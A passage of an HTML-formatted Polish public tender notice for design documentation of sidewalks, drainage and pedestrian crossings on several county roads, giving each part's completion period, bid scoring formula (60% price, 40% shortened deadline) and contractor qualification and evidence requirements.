8 SWZ.Jako pierwszy dzień biegu wskazanego terminu przyjmuje się następny dzień po dacie podpisania umowy. Punkty będą przyznawane za skrócenie maksymalnego określonego terminu realizacji zamówienia, wg następującego schematu:- wykonanie całości zamówienia w terminie określonym w SWZ – 0 pkt,- skrócenie terminu wykonania całości zamówienia o 14 dni – 20 pkt,- skrócenie terminu wykonania całości zamówienia o 28 dni – 40 pkt.7. Za Najkorzystniejszą ofertę Zamawiający uzna tę, która otrzyma najwyższą liczbę punktów wg kryteriów oceny ofert.8. Jeżeli nie można wybrać oferty najkorzystniejszej ze względu na to, żedwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z niższą ceną.9. Zamawiający udzieli zamówienia wykonawcy, którego oferta będzie najkorzystniejsza. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opracowanie dokumentacji projektowej budowy chodnika wzdłuż drogi powiatowej nr 2128K ul.Zielona w Bolechowicach w zakresie budowy chodnika wraz z odwodnieniem, przebudowązjazdów na długości ok. 150 m oraz budową przejścia dla pieszych z oświetleniemdedykowanym wraz z uzyskaniem stosownych uzgodnień i właściwych decyzji administracyjnychwymaganych przepisami prawa budowlanego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">240 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. O udzielenie zamówienia ubiegać się mogą wykonawcy, którzy złożą ważną ofertę.2.Zamawiający dokona wyboru najkorzystniejszej oferty spośród ważnych ofert.3. Przy wyborze najkorzystniejszej oferty spośród ofert nie odrzuconych, Zamawiający kierował się będzie następującymi kryteriami i ich wagą: - cena ofertowa brutto - 60% - termin realizacji zamówienia - 40% 4. Obliczanie punktacji oferty wg wzoru: Pof = Pc + PT+ Pp5. Obliczanie punktacji dla kryterium cenowego wg wzoru: Pc = Cmin / Cb.of x Kp x Wc gdzie : Pc - ilość punktów przyznanych ofercie ocenianej Cmin - najniższa cena ofertowa Cb.of - cena badanej oferty Kp - współczynnik proporcjonalności = 100Wc - waga procentowa dla kryterium = 60%6. Obliczanie punktacji dla kryterium termin realizacji zamówienia PT: Zamawiający określa maksymalny termin realizacji zamówienia dla poszczególnych zadań zgodnie z opisem w części I ust 8 SWZ.Jako pierwszy dzień biegu wskazanego terminu przyjmuje się następny dzień po dacie podpisania umowy. Punkty będą przyznawane za skrócenie maksymalnego określonego terminu realizacji zamówienia, wg następującego schematu:- wykonanie całości zamówienia w terminie określonym w SWZ – 0 pkt,- skrócenie terminu wykonania całości zamówienia o 14 dni – 20 pkt,- skrócenie terminu wykonania całości zamówienia o 28 dni – 40 pkt.7. Za Najkorzystniejszą ofertę Zamawiający uzna tę, która otrzyma najwyższą liczbę punktów wg kryteriów oceny ofert.8. Jeżeli nie można wybrać oferty najkorzystniejszej ze względu na to, żedwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z niższą ceną.9. Zamawiający udzieli zamówienia wykonawcy, którego oferta będzie najkorzystniejsza.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">skrócenie terminu realizacji zamowienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1. O udzielenie zamówienia ubiegać się mogą wykonawcy, którzy złożą ważną ofertę.2.Zamawiający dokona wyboru najkorzystniejszej oferty spośród ważnych ofert.3. Przy wyborze najkorzystniejszej oferty spośród ofert nie odrzuconych, Zamawiający kierował się będzie następującymi kryteriami i ich wagą: - cena ofertowa brutto - 60% - termin realizacji zamówienia - 40% 4. Obliczanie punktacji oferty wg wzoru: Pof = Pc + PT+ Pp5. Obliczanie punktacji dla kryterium cenowego wg wzoru: Pc = Cmin / Cb.of x Kp x Wc gdzie : Pc - ilość punktów przyznanych ofercie ocenianej Cmin - najniższa cena ofertowa Cb.of - cena badanej oferty Kp - współczynnik proporcjonalności = 100Wc - waga procentowa dla kryterium = 60%6. Obliczanie punktacji dla kryterium termin realizacji zamówienia PT: Zamawiający określa maksymalny termin realizacji zamówienia dla poszczególnych zadań zgodnie z opisem w części I ust 8 SWZ.Jako pierwszy dzień biegu wskazanego terminu przyjmuje się następny dzień po dacie podpisania umowy. Punkty będą przyznawane za skrócenie maksymalnego określonego terminu realizacji zamówienia, wg następującego schematu:- wykonanie całości zamówienia w terminie określonym w SWZ – 0 pkt,- skrócenie terminu wykonania całości zamówienia o 14 dni – 20 pkt,- skrócenie terminu wykonania całości zamówienia o 28 dni – 40 pkt.7. Za Najkorzystniejszą ofertę Zamawiający uzna tę, która otrzyma najwyższą liczbę punktów wg kryteriów oceny ofert.8. Jeżeli nie można wybrać oferty najkorzystniejszej ze względu na to, żedwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z niższą ceną.9. Zamawiający udzieli zamówienia wykonawcy, którego oferta będzie najkorzystniejsza. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opracowanie dokumentacji projektowej budowy chodnika wraz z elementami odwodnieniawzdłuż drogi powiatowej nr 1082K w m. Czubrowice w zakresie budowy chodnika wraz zodwodnieniem, przebudową zjazdów oraz uzyskaniem stosownych uzgodnień i właściwychdecyzji administracyjnych wymaganych przepisami prawa budowlanego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">540 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. O udzielenie zamówienia ubiegać się mogą wykonawcy, którzy złożą ważną ofertę.2.Zamawiający dokona wyboru najkorzystniejszej oferty spośród ważnych ofert.3. Przy wyborze najkorzystniejszej oferty spośród ofert nie odrzuconych, Zamawiający kierował się będzie następującymi kryteriami i ich wagą: - cena ofertowa brutto - 60% - termin realizacji zamówienia - 40% 4. Obliczanie punktacji oferty wg wzoru: Pof = Pc + PT+ Pp5. Obliczanie punktacji dla kryterium cenowego wg wzoru: Pc = Cmin / Cb.of x Kp x Wc gdzie : Pc - ilość punktów przyznanych ofercie ocenianej Cmin - najniższa cena ofertowa Cb.of - cena badanej oferty Kp - współczynnik proporcjonalności = 100Wc - waga procentowa dla kryterium = 60%6. Obliczanie punktacji dla kryterium termin realizacji zamówienia PT: Zamawiający określa maksymalny termin realizacji zamówienia dla poszczególnych zadań zgodnie z opisem w części I ust 8 SWZ.Jako pierwszy dzień biegu wskazanego terminu przyjmuje się następny dzień po dacie podpisania umowy. Punkty będą przyznawane za skrócenie maksymalnego określonego terminu realizacji zamówienia, wg następującego schematu:- wykonanie całości zamówienia w terminie określonym w SWZ – 0 pkt,- skrócenie terminu wykonania całości zamówienia o 14 dni – 20 pkt,- skrócenie terminu wykonania całości zamówienia o 28 dni – 40 pkt.7. Za Najkorzystniejszą ofertę Zamawiający uzna tę, która otrzyma najwyższą liczbę punktów wg kryteriów oceny ofert.8. Jeżeli nie można wybrać oferty najkorzystniejszej ze względu na to, żedwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z niższą ceną.9. Zamawiający udzieli zamówienia wykonawcy, którego oferta będzie najkorzystniejsza.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">skrócenie terminu realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1. O udzielenie zamówienia ubiegać się mogą wykonawcy, którzy złożą ważną ofertę.2.Zamawiający dokona wyboru najkorzystniejszej oferty spośród ważnych ofert.3. Przy wyborze najkorzystniejszej oferty spośród ofert nie odrzuconych, Zamawiający kierował się będzie następującymi kryteriami i ich wagą: - cena ofertowa brutto - 60% - termin realizacji zamówienia - 40% 4. Obliczanie punktacji oferty wg wzoru: Pof = Pc + PT+ Pp5. Obliczanie punktacji dla kryterium cenowego wg wzoru: Pc = Cmin / Cb.of x Kp x Wc gdzie : Pc - ilość punktów przyznanych ofercie ocenianej Cmin - najniższa cena ofertowa Cb.of - cena badanej oferty Kp - współczynnik proporcjonalności = 100Wc - waga procentowa dla kryterium = 60%6. Obliczanie punktacji dla kryterium termin realizacji zamówienia PT: Zamawiający określa maksymalny termin realizacji zamówienia dla poszczególnych zadań zgodnie z opisem w części I ust 8 SWZ.Jako pierwszy dzień biegu wskazanego terminu przyjmuje się następny dzień po dacie podpisania umowy. Punkty będą przyznawane za skrócenie maksymalnego określonego terminu realizacji zamówienia, wg następującego schematu:- wykonanie całości zamówienia w terminie określonym w SWZ – 0 pkt,- skrócenie terminu wykonania całości zamówienia o 14 dni – 20 pkt,- skrócenie terminu wykonania całości zamówienia o 28 dni – 40 pkt.7. Za Najkorzystniejszą ofertę Zamawiający uzna tę, która otrzyma najwyższą liczbę punktów wg kryteriów oceny ofert.8. Jeżeli nie można wybrać oferty najkorzystniejszej ze względu na to, żedwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z niższą ceną.9. Zamawiający udzieli zamówienia wykonawcy, którego oferta będzie najkorzystniejsza. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opracowanie dokumentacji projektowej budowy utwardzonego pobocza w ciągu drogipowiatowej nr 2142K w m. Smroków na odcinku ok. 500 m wraz z odwodnieniem, budowąprzejścia dla pieszych z oświetleniem dedykowanym, wraz z uzyskaniem stosownych uzgodnieńi właściwych decyzji administracyjnych wymaganych przepisami prawa budowlanego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. O udzielenie zamówienia ubiegać się mogą wykonawcy, którzy złożą ważną ofertę.2.Zamawiający dokona wyboru najkorzystniejszej oferty spośród ważnych ofert.3. Przy wyborze najkorzystniejszej oferty spośród ofert nie odrzuconych, Zamawiający kierował się będzie następującymi kryteriami i ich wagą: - cena ofertowa brutto - 60% - termin realizacji zamówienia - 40% 4. Obliczanie punktacji oferty wg wzoru: Pof = Pc + PT+ Pp5. Obliczanie punktacji dla kryterium cenowego wg wzoru: Pc = Cmin / Cb.of x Kp x Wc gdzie : Pc - ilość punktów przyznanych ofercie ocenianej Cmin - najniższa cena ofertowa Cb.of - cena badanej oferty Kp - współczynnik proporcjonalności = 100Wc - waga procentowa dla kryterium = 60%6. Obliczanie punktacji dla kryterium termin realizacji zamówienia PT: Zamawiający określa maksymalny termin realizacji zamówienia dla poszczególnych zadań zgodnie z opisem w części I ust 8 SWZ.Jako pierwszy dzień biegu wskazanego terminu przyjmuje się następny dzień po dacie podpisania umowy. Punkty będą przyznawane za skrócenie maksymalnego określonego terminu realizacji zamówienia, wg następującego schematu:- wykonanie całości zamówienia w terminie określonym w SWZ – 0 pkt,- skrócenie terminu wykonania całości zamówienia o 14 dni – 20 pkt,- skrócenie terminu wykonania całości zamówienia o 28 dni – 40 pkt.7. Za Najkorzystniejszą ofertę Zamawiający uzna tę, która otrzyma najwyższą liczbę punktów wg kryteriów oceny ofert.8. Jeżeli nie można wybrać oferty najkorzystniejszej ze względu na to, żedwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z niższą ceną.9. Zamawiający udzieli zamówienia wykonawcy, którego oferta będzie najkorzystniejsza.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">skrócenie terminu realizacji zamowienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1. O udzielenie zamówienia ubiegać się mogą wykonawcy, którzy złożą ważną ofertę.2.Zamawiający dokona wyboru najkorzystniejszej oferty spośród ważnych ofert.3. Przy wyborze najkorzystniejszej oferty spośród ofert nie odrzuconych, Zamawiający kierował się będzie następującymi kryteriami i ich wagą: - cena ofertowa brutto - 60% - termin realizacji zamówienia - 40% 4. Obliczanie punktacji oferty wg wzoru: Pof = Pc + PT+ Pp5. Obliczanie punktacji dla kryterium cenowego wg wzoru: Pc = Cmin / Cb.of x Kp x Wc gdzie : Pc - ilość punktów przyznanych ofercie ocenianej Cmin - najniższa cena ofertowa Cb.of - cena badanej oferty Kp - współczynnik proporcjonalności = 100Wc - waga procentowa dla kryterium = 60%6. Obliczanie punktacji dla kryterium termin realizacji zamówienia PT: Zamawiający określa maksymalny termin realizacji zamówienia dla poszczególnych zadań zgodnie z opisem w części I ust 8 SWZ.Jako pierwszy dzień biegu wskazanego terminu przyjmuje się następny dzień po dacie podpisania umowy. Punkty będą przyznawane za skrócenie maksymalnego określonego terminu realizacji zamówienia, wg następującego schematu:- wykonanie całości zamówienia w terminie określonym w SWZ – 0 pkt,- skrócenie terminu wykonania całości zamówienia o 14 dni – 20 pkt,- skrócenie terminu wykonania całości zamówienia o 28 dni – 40 pkt.7. Za Najkorzystniejszą ofertę Zamawiający uzna tę, która otrzyma najwyższą liczbę punktów wg kryteriów oceny ofert.8. Jeżeli nie można wybrać oferty najkorzystniejszej ze względu na to, żedwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z niższą ceną.9. Zamawiający udzieli zamówienia wykonawcy, którego oferta będzie najkorzystniejsza. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opracowanie dokumentacji projektowej budowy chodnika przy drodze powiatowej nr 2161KWysiołek Luborzycki, Marszowice w zakresie budowy chodnika wraz z odwodnieniem,przebudową zjazdów oraz budową przejścia dla pieszych z oświetleniem dedykowanym, wraz zuzyskaniem stosownych uzgodnień i właściwych decyzji administracyjnych wymaganychprzepisami prawa budowlanego wraz z decyzją ZRID. Zamawiający wymaga aby projektwstępny (Etap I) obejmował opracowanie 3 wariantów rozwiązania budowy chodnika. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">540 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. O udzielenie zamówienia ubiegać się mogą wykonawcy, którzy złożą ważną ofertę.2.Zamawiający dokona wyboru najkorzystniejszej oferty spośród ważnych ofert.3. Przy wyborze najkorzystniejszej oferty spośród ofert nie odrzuconych, Zamawiający kierował się będzie następującymi kryteriami i ich wagą: - cena ofertowa brutto - 60% - termin realizacji zamówienia - 40% 4. Obliczanie punktacji oferty wg wzoru: Pof = Pc + PT+ Pp5. Obliczanie punktacji dla kryterium cenowego wg wzoru: Pc = Cmin / Cb.of x Kp x Wc gdzie : Pc - ilość punktów przyznanych ofercie ocenianej Cmin - najniższa cena ofertowa Cb.of - cena badanej oferty Kp - współczynnik proporcjonalności = 100Wc - waga procentowa dla kryterium = 60%6. Obliczanie punktacji dla kryterium termin realizacji zamówienia PT: Zamawiający określa maksymalny termin realizacji zamówienia dla poszczególnych zadań zgodnie z opisem w części I ust 8 SWZ.Jako pierwszy dzień biegu wskazanego terminu przyjmuje się następny dzień po dacie podpisania umowy. Punkty będą przyznawane za skrócenie maksymalnego określonego terminu realizacji zamówienia, wg następującego schematu:- wykonanie całości zamówienia w terminie określonym w SWZ – 0 pkt,- skrócenie terminu wykonania całości zamówienia o 14 dni – 20 pkt,- skrócenie terminu wykonania całości zamówienia o 28 dni – 40 pkt.7. Za Najkorzystniejszą ofertę Zamawiający uzna tę, która otrzyma najwyższą liczbę punktów wg kryteriów oceny ofert.8. Jeżeli nie można wybrać oferty najkorzystniejszej ze względu na to, żedwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z niższą ceną.9. Zamawiający udzieli zamówienia wykonawcy, którego oferta będzie najkorzystniejsza.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">skrócenie terminu realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1. O udzielenie zamówienia ubiegać się mogą wykonawcy, którzy złożą ważną ofertę.2.Zamawiający dokona wyboru najkorzystniejszej oferty spośród ważnych ofert.3. Przy wyborze najkorzystniejszej oferty spośród ofert nie odrzuconych, Zamawiający kierował się będzie następującymi kryteriami i ich wagą: - cena ofertowa brutto - 60% - termin realizacji zamówienia - 40% 4. Obliczanie punktacji oferty wg wzoru: Pof = Pc + PT+ Pp5. Obliczanie punktacji dla kryterium cenowego wg wzoru: Pc = Cmin / Cb.of x Kp x Wc gdzie : Pc - ilość punktów przyznanych ofercie ocenianej Cmin - najniższa cena ofertowa Cb.of - cena badanej oferty Kp - współczynnik proporcjonalności = 100Wc - waga procentowa dla kryterium = 60%6. Obliczanie punktacji dla kryterium termin realizacji zamówienia PT: Zamawiający określa maksymalny termin realizacji zamówienia dla poszczególnych zadań zgodnie z opisem w części I ust 8 SWZ.Jako pierwszy dzień biegu wskazanego terminu przyjmuje się następny dzień po dacie podpisania umowy. Punkty będą przyznawane za skrócenie maksymalnego określonego terminu realizacji zamówienia, wg następującego schematu:- wykonanie całości zamówienia w terminie określonym w SWZ – 0 pkt,- skrócenie terminu wykonania całości zamówienia o 14 dni – 20 pkt,- skrócenie terminu wykonania całości zamówienia o 28 dni – 40 pkt.7. Za Najkorzystniejszą ofertę Zamawiający uzna tę, która otrzyma najwyższą liczbę punktów wg kryteriów oceny ofert.8. Jeżeli nie można wybrać oferty najkorzystniejszej ze względu na to, żedwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z niższą ceną.9. Zamawiający udzieli zamówienia wykonawcy, którego oferta będzie najkorzystniejsza. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) Posiadania zdolności do występowania w obrocie gospodarczym. Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.2) Posiadania kompetencji lub uprawnień do wykonaniaokreślonej działalności zawodowej jeżeli przepisy prawa nakładają obowiązek ichposiadania.Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.3) Zdolności technicznej i zawodowej.3.1) Wykonawca spełni ten warunek jeżeli wykaże, że w okresieostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał minimum jeden projekt budowlano –wykonawczy budowy lub przebudowy drogi w zakresie budowy chodnika z kanalizacją wraz zzaprojektowaniem warstw konstrukcji nawierzchni jezdni o długości nie mniejszej niż 1 km orazuzyskał stosowne uzgodnienia, zaświadczenia i właściwe decyzje administracyjne, Napotwierdzenie spełniania tego warunku Wykonawca złoży „Wykaz usług” - załącznik nr 2 SWZwraz z załączeniem dokumentu potwierdzającego, że usługi zostały wykonane należycie.3.2) W zakresie dysponowania osobami skierowanymi do realizacji zamówienia Wykonawca spełni tenwarunek jeżeli wykaże, że dysponuje:  projektantem drogowym posiadającym wyższewykształcenie techniczne, uprawnienia budowlane do projektowania w specjalności drogowej bez ograniczeń, 2 letnie doświadczenie (liczone od uzyskania uprawnień) zawodowe w projektowaniu drogowym; projektantem sieci sanitarnych posiadającym uprawnienia budowlanedo projektowania w specjalności instalacyjnej w zakresie sieci gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, 2 letnie doświadczenie (liczone od uzyskania uprawnień) zawodowe w projektowaniu w zakresie sieci sanitarnych; Na potwierdzenie spełniania tego warunku Wykonawca złoży „Wykaz osób” - załącznik Nr 3 SWZ.4) Sytuacji ekonomicznej ifinansowej.Zamawiający nie precyzuje w tym zakresie szczególnych wymagań. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.2) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające,żewykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie wsprawie spłat tych należności;3) zaświadczenie albo inny dokument właściwej terenowej jednostkiorganizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art.109 ust. 1 pkt1 ustawy, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przedupływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tychnależności.4) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r.o ochronie konkurencji i konsumentów (Dz.U. Z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę,ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymiprzygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowe . Wzór oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 108 ust. 1pkt 5 Pzp stanowi Załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykaz osób, 